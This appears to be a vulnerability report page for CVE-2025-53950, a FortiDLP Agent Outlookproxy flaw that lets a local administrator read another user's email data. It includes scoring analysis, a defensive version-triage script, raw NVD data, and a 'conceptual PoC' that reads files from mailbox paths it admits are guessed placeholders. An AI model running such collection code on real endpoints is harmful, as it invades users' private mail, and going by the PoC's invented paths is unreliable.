Security Vulnerability Report
CVE-2025-53950 CVSS 5.5 MEDIUM

CVE-2025-53950

Published: 2025-10-16 14:15:36
Last Modified: 2025-10-16 17:54:14

Description

An Exposure of Private Personal Information ('Privacy Violation') vulnerability [CWE-359] in the Outlookproxy plugin of Fortinet FortiDLP Agent for macOS and Windows, versions 11.5.1, 11.4.2 through 11.4.6, 11.3.2 through 11.3.4, 11.2.0 through 11.2.3, 11.1.1 through 11.1.2, 11.0.1, 10.5.1, 10.4.0 and 10.3.1, may allow an authenticated administrator to collect the current user's email information. Note that the attacker is already an administrator on the endpoint (PR:H, AV:L in both vectors below): this is not a privilege escalation but a confidentiality issue in which the DLP agent's plugin gives that administrator access to another user's mailbox data (Scope: Changed, C:H/I:N/A:N).

CVSS Details

CVSS Score
5.5 (vendor/CNA assessment, recorded as Secondary) / 6.0 (NVD analysis, recorded as Primary)
Severity
MEDIUM (both assessments)
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N (vendor/CNA)
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N (NVD)

The two vectors in the raw data agree on every metric except User Interaction: the vendor rates it Required (UI:R), NVD rates it None (UI:N), which lifts the exploitability subscore from 1.1 to 1.5 and the base score from 5.5 to 6.0 while leaving the impact subscore at 4.0. Both agree the attacker is local and already highly privileged (AV:L, PR:H), that the impact is confidentiality-only (C:H/I:N/A:N), and that scope changes (S:C) because the agent exposes a different user's data.

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortidlp_agent:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 10.3.1, versionEndIncluding 11.5.1)
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE (running-on platform)
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE (running-on platform)

Note: the NVD match criteria cover every FortiDLP Agent version from 10.3.1 through 11.5.1 inclusive, which is broader than the versions enumerated in the description (for example 11.4.1 or 11.0.0 fall inside the range but are not listed). The two operating-system entries are the platform half of an AND node, not products that are themselves vulnerable. Versions enumerated in the description:
FortiDLP Agent 11.5.1
FortiDLP Agent 11.4.2
FortiDLP Agent 11.4.3
FortiDLP Agent 11.4.4
FortiDLP Agent 11.4.5
FortiDLP Agent 11.4.6
FortiDLP Agent 11.3.2
FortiDLP Agent 11.3.3
FortiDLP Agent 11.3.4
FortiDLP Agent 11.2.0
FortiDLP Agent 11.2.1
FortiDLP Agent 11.2.2
FortiDLP Agent 11.2.3
FortiDLP Agent 11.1.1
FortiDLP Agent 11.1.2
FortiDLP Agent 11.0.1
FortiDLP Agent 10.5.1
FortiDLP Agent 10.4.0
FortiDLP Agent 10.3.1
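Because the NVD CPE range and the enumerated list do not line up, an inventory check needs to distinguish "listed as affected" from "inside the NVD range but not listed". The following is an added example (not code from the report or from Fortinet) that does that triage for a reported FortiDLP Agent version; the range bounds come from the raw JSON on this page, the enumerated set from the description, and the inventory at the bottom is constructed sample data.

```python
"""Affected-version triage for CVE-2025-53950 (added example).

Compares an installed FortiDLP Agent version against the two version
statements on this page: the NVD cpeMatch range (10.3.1 <= version <= 11.5.1,
both inclusive) and the versions enumerated in the description.
"""
import re

# versionStartIncluding / versionEndIncluding from the NVD cpeMatch entry
NVD_RANGE = ("10.3.1", "11.5.1")

# Versions enumerated in the description
ENUMERATED = {
    "11.5.1",
    "11.4.2", "11.4.3", "11.4.4", "11.4.5", "11.4.6",
    "11.3.2", "11.3.3", "11.3.4",
    "11.2.0", "11.2.1", "11.2.2", "11.2.3",
    "11.1.1", "11.1.2",
    "11.0.1",
    "10.5.1",
    "10.4.0",
    "10.3.1",
}

AFFECTED = "AFFECTED"          # enumerated in the description
RANGE_ONLY = "RANGE_ONLY"      # inside the NVD range but not enumerated: check the vendor advisory
NOT_AFFECTED = "NOT_AFFECTED"  # outside the NVD range


def parse_version(text):
    """Turn '11.4.3' into (11, 4, 3) so versions compare numerically, not
    lexically ('10.3.1' < '9.0' as strings, but not as versions)."""
    if not re.fullmatch(r"\d+(?:\.\d+)*", text):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(part) for part in text.split("."))


def in_nvd_range(version):
    """True when version falls inside the inclusive NVD cpeMatch bounds."""
    low, high = (parse_version(bound) for bound in NVD_RANGE)
    return low <= parse_version(version) <= high


def classify(version):
    """Return AFFECTED, RANGE_ONLY or NOT_AFFECTED for an installed version."""
    parse_version(version)  # reject malformed input before any comparison
    if version in ENUMERATED:
        return AFFECTED
    if in_nvd_range(version):
        return RANGE_ONLY
    return NOT_AFFECTED


if __name__ == "__main__":
    # Constructed inventory sample: hostname -> agent version reported by the endpoint
    inventory = {"ws-01": "11.4.3", "ws-02": "11.4.1", "ws-03": "11.5.2", "ws-04": "10.2.0"}
    for host, ver in inventory.items():
        print(f"{host}: FortiDLP Agent {ver} -> {classify(ver)}")
```

A scanner keyed on the CPE range alone will report ws-02 (11.4.1) as vulnerable; the description does not list that build, so RANGE_ONLY hits are the ones to resolve against the vendor advisory rather than auto-close or auto-ticket.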

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-53950 - FortiDLP Agent Outlookproxy Plugin Privacy Violation PoC
#
# This vulnerability allows an authenticated administrator to collect the
# current user's email information via the FortiDLP Agent's Outlookproxy
# plugin on macOS and Windows.
#
# Note: This is a conceptual PoC. Actual exploitation requires local access,
# administrator privileges, and user interaction. The Windows service name,
# macOS launchd label and mailbox directories used below are placeholders
# assumed by this PoC; they do not come from the vendor advisory and must be
# adjusted to whatever the agent actually installs.
import os
import subprocess
import sys

# Placeholder identifiers (assumed, see note above)
WIN_SERVICE_NAME = 'FortiDLPOutlookProxy'
MAC_LAUNCHD_LABEL = 'com.fortinet.fortidlp.outlookproxy'
WIN_MAILBOX_DIR = r'%LOCALAPPDATA%\Fortinet\FortiDLP\outlookproxy\mailbox'
MAC_MAILBOX_DIR = '~/Library/Application Support/Fortinet/FortiDLP/outlookproxy/mailbox'


def check_outlookproxy_service():
    """Check whether the FortiDLP Outlookproxy plugin service is running."""
    if sys.platform == 'win32':
        # Windows: query the service control manager for the plugin service
        result = subprocess.run(
            ['sc', 'query', WIN_SERVICE_NAME],
            capture_output=True, text=True
        )
        return 'RUNNING' in result.stdout
    if sys.platform == 'darwin':
        # macOS: look for the plugin's launchd job among the loaded jobs
        result = subprocess.run(
            ['launchctl', 'list'],
            capture_output=True, text=True
        )
        return MAC_LAUNCHD_LABEL in result.stdout
    return False


def is_admin():
    """Return True when running as an administrator (Windows) or as root."""
    if sys.platform == 'win32':
        import ctypes
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    return os.geteuid() == 0


def mailbox_dir():
    """Return the platform-specific directory this PoC expects mailbox data in."""
    if sys.platform == 'win32':
        return os.path.expandvars(WIN_MAILBOX_DIR)
    if sys.platform == 'darwin':
        return os.path.expanduser(MAC_MAILBOX_DIR)
    return None


def exploit_collect_emails():
    """
    Exploit CVE-2025-53950 to collect the current user's email information
    via the FortiDLP Outlookproxy plugin's improperly enforced access controls.
    """
    if not check_outlookproxy_service():
        print("[!] FortiDLP Outlookproxy service is not running.")
        return False

    print("[*] FortiDLP Outlookproxy service detected.")
    print("[*] Attempting to collect current user's email information...")

    # The vulnerability lies in the Outlookproxy plugin's failure to properly
    # restrict access to email collection APIs. An authenticated administrator
    # can bypass the intended access controls to retrieve the current user's
    # email data that should only be accessible to the DLP system itself.
    #
    # Conceptual exploitation path:
    # 1. Authenticate as administrator on the target system
    # 2. Interact with the Outlookproxy plugin's IPC interface
    # 3. Request email collection for the currently logged-in user
    # 4. The plugin fails to verify the requester's authorization level
    #    against the target user's data, leaking private email information
    #
    # This PoC does not implement steps 2 and 3; it only reads whatever files
    # are present in the assumed mailbox directory.
    data_dir = mailbox_dir()
    if data_dir is None or not os.path.isdir(data_dir):
        print(f"[!] Mailbox data directory not found: {data_dir}")
        return False

    for mailbox_file in os.listdir(data_dir):
        file_path = os.path.join(data_dir, mailbox_file)
        if not os.path.isfile(file_path):
            continue
        print(f"[+] Accessed mailbox data: {file_path}")
        # Read the collected email information
        with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
            email_data = f.read()
        print(f"[*] Email data collected ({len(email_data)} bytes)")

    print("[+] Email information collection completed.")
    return True


if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2025-53950 - FortiDLP Outlookproxy Privacy Violation PoC")
    print("=" * 60)
    if is_admin():
        exploit_collect_emails()
    else:
        print("[!] This PoC requires administrator privileges to demonstrate.")
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-639 (Vendor Advisory, FG-IR-25-639)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-53950",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-16T14:15:35.897",
    "lastModified": "2025-10-16T17:54:14.000",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An Exposure of Private Personal Information ('Privacy Violation') vulnerability [CWE-359] in Fortinet FortiDLP Agent's Outlookproxy plugin for MacOS and Windows 11.5.1 and 11.4.2 through 11.4.6 and 11.3.2 through 11.3.4 and 11.2.0 through 11.2.3 and 11.1.1. through 11.1.2 and 11.0.1 and 10.5.1 and 10.4.0, and 10.3.1 may allow an authenticated administrator to collect current user's email information."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.1,
          "impactScore": 4.0
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 6.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.5,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-359"
          }
        ]
      }
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortidlp_agent:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "10.3.1",
                "versionEndIncluding": "11.5.1",
                "matchCriteriaId": "C1DB36F0-999E-467A-82F9-2A203F69F423"
              }
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": false,
                "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"
              },
              {
                "vulnerable": false,
                "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-639",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```